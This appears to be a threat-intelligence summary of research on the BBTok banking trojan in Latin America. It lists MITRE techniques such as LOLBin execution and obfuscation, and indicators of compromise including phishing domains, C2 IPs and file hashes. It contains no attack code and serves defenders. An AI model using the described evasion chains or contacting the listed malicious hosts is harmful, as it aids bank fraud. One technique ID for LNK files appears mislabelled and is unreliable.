Check Point Research details an active BBTok banker campaign in Latin America that uses server-side components and LOLBins to deliver unique payloads per victim, evading detection across Brazil and Mexico. The report covers how infection chains are generated on demand, the bank-impersonation capabilities, and the evolution of TTPs including new exploits and obfuscation methods. #BBTok #Trammy #Gammy #Brammy #Kammy #Follina #BBTokBanker
Keypoints
- BBTok remains active in Brazil and Mexico, using multi-layered geo-fencing to restrict infections to those countries.
- Since 2020, operators have added obfuscation, additional downloaders, and varied infection chains, lowering detection rates.
- The banker can replicate interfaces for over 40 banks (e.g., Citibank Brasil, HSBC) to harvest 2FA codes and card numbers.
- A custom server-side application generates unique payloads per victim based on OS and location.
- Payload server analysis shows diversified Windows infection chains using ISO, ZIP, LNK, DOCX, JS, and XLL file types.
- Attackers incorporate open-source code and new exploits (e.g., Follina) into their toolkit and obfuscation techniques like Add-PoshObfuscation.
MITRE Techniques
- [T1566.002] Phishing – Spearphishing Link – The campaign distributes malicious payloads via phishing links rather than attachments. “phishing links” and decoy content are used to deliver payloads.
- [T1059.001] PowerShell – The PowerShell payload generator (ps_gen.ps1) creates and delivers the lure archives and executes payload stages. “The script ps_gen.ps1 contains the main logic for generating archive payloads”
- [T1218.011] Signed Binary Proxy Execution: Rundll32 – The Windows 7 chain uses rundll32.exe to execute a DLL loader before running the BBTok payload. “rundll32.exe” is used to run the loader.
- [T1105] Ingress Tool Transfer – The server downloads DLLs and components from remote hosts (e.g., Trammy, Gammy) during infection stages. “downloads the relevant remote DLL via CMD execution”
- [T1027] Obfuscated/Compressed Files and Information – Add-PoshObfuscation obfuscates payloads to evade detection. “All payloads are obfuscated using the Add-PoshObfuscation function.”
- [T1127] MSBuild – Windows 10 infection chain uses MSBuild.exe to compile and execute a payload from a remote XML/server. “MSBuild.exe creates a randomly named DLL… and runs it”
- [T1059.005] Windows Command Shell – The Windows 10 chain uses CMD commands and SMB-based file fetch to orchestrate execution. “The XML file used by MSBuild… fetched over SMB”
- [T1024] LNK File – The infection chain is kickstarted by an LNK file contained in an archive, which launches subsequent stages. “The LNK file kicks off the infection chain”
Indicators of Compromise
- [Domain] Phishing domains – danfe.is-certified.com, rendinfo.shop – used for credential harvesting and lure delivery
- [Domain] Malicious DLL download domain – sodkvsodkv.supplier.serveftp.net
- [IP] Payload and C2/Distribution IPs – 216.250.251.196, 173.249.196.195, 176.31.159.196, 147.124.213.152
- [File name] Lure archives and payloads – e.g., DANFE357702036539112.iso, HtmlFactura3f48daa069f0e42253194ca7b51e7481DPCYKJ4Ojk.iso
- [SHA-256] Payload and lure hashes – be36c832a1186fd752dd975d31284bdd2ac3342bd3d32980c6c52271d0d2c84c, 07028ec2a727330a3710dba8940aa97809f47e75e1fd9485d8fc52a3c018a128